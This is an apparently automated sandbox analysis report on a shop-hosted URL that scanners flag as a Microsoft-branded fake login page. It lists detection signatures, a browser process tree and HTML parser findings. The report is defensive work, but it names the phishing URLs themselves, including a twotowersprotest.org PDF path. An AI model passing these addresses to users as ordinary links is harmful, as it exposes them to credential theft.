Loading ...

Play interactive tourEdit tour

Windows Analysis Report https://473282.myshoptet.com/surelet01/

Overview

General Information

Sample URL:https://473282.myshoptet.com/surelet01/
Analysis ID:502494
Infos:

Most interesting Screenshot:

Detection

HTMLPhisher
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Phishing site detected (based on favicon image match)
Yara detected HtmlPhish10
Antivirus detection for URL or domain
Phishing site detected (based on image similarity)
HTML body contains low number of good links
Found iframes
No HTML title found
Form action URLs do not match main URL

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 6312 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation 'https://473282.myshoptet.com/surelet01/' MD5: C139654B5C1438A95B321BB01AD63EF6)
    • chrome.exe (PID: 6528 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1524,6113479614288932569,12517739123380968407,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1932 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: https://473282.myshoptet.com/surelet01/SlashNext: detection malicious, Label: Fake Login Page type: Phishing & Social Engineering
Antivirus detection for URL or domainShow sources
Source: https://twotowersprotest.org/post/PDF/SlashNext: Label: Fake Login Page type: Phishing & Social Engineering

Phishing:

barindex
Phishing site detected (based on favicon image match)Show sources
Source: https://twotowersprotest.org/post/PDF/Matcher: Template: microsoft matched with high similarity
Yara detected HtmlPhish10Show sources
Source: Yara matchFile source: 50331.8.pages.csv, type: HTML
Phishing site detected (based on image similarity)Show sources
Source: https://twotowersprotest.org/post/PDF/Matcher: Found strong image similarity, brand: Microsoft image: 50331.8.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
Source: https://twotowersprotest.org/post/PDF/HTTP Parser: Number of links: 0
Source: https://www.shoptet.sk/?utm_source=footer&utm_medium=link&utm_campaign=create_by_shoptetHTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-W8H93G
Source: https://www.shoptet.sk/?utm_source=footer&utm_medium=link&utm_campaign=create_by_shoptetHTTP Parser: Iframe src: https://platform.twitter.com/widgets/widget_iframe.58065ae230495f5d9e4b6a916472b2c1.html?origin=https%3A%2F%2Fwww.shoptet.sk
Source: https://www.shoptet.sk/?utm_source=footer&utm_medium=link&utm_campaign=create_by_shoptetHTTP Parser: Iframe src: //11189376.fls.doubleclick.net/activityi;src=11189376;type=invmedia;cat=rmkt_0;ord=7309702678925;gtm=2wgab0;auiddc=1347560484.1634163607;~oref=https%3A%2F%2Fwww.shoptet.sk%2F%3Futm_source%3Dfooter%26utm_medium%3Dlink%26utm_campaign%3Dcreate_by_shoptet?
Source: https://www.shoptet.sk/?utm_source=footer&utm_medium=link&utm_campaign=create_by_shoptetHTTP Parser: Iframe src: https://vars.hotjar.com/box-acff0d328b74363875a0a6075e6c8439.html
Source: https://473282.myshoptet.com/login/?backTo=%2Fsurelet01%2FHTTP Parser: HTML title missing
Source: https://twotowersprotest.org/post/PDF/HTTP Parser: HTML title missing
Source: https://www.shoptet.sk/?utm_source=footer&utm_medium=link&utm_campaign=create_by_shoptetHTTP Parser: HTML title missing
Source: https://473282.myshoptet.com/login/?backTo=%2FHTTP Parser: HTML title missing
Source: https://twitter.com/intent/tweet?url=HTTP Parser: HTML title missing
Source: https://www.shoptet.sk/?utm_source=footer&utm_medium=link&utm_campaign=create_by_shoptetHTTP Parser: Form action: https://www.facebook.com/tr/ shoptet facebook
Source: https://473282.myshoptet.com/login/?backTo=%2Fsurelet01%2FHTTP Parser: No <meta name="author".. found
Source: https://twotowersprotest.org/post/PDF/HTTP Parser: No <meta name="author".. found
Source: https://473282.myshoptet.com/login/?backTo=%2FHTTP Parser: No <meta name="author".. found
Source: https://twitter.com/intent/tweet?url=HTTP Parser: No <meta name="author".. found
Source: https://473282.myshoptet.com/login/?backTo=%2Fsurelet01%2FHTTP Parser: No <meta name="copyright".. found
Source: https://twotowersprotest.org/post/PDF/HTTP Parser: No <meta name="copyright".. found
Source: https://473282.myshoptet.com/login/?backTo=%2FHTTP Parser: No <meta name="copyright".. found
Source: https://twitter.com/intent/tweet?url=HTTP Parser: No <meta name="copyright".. found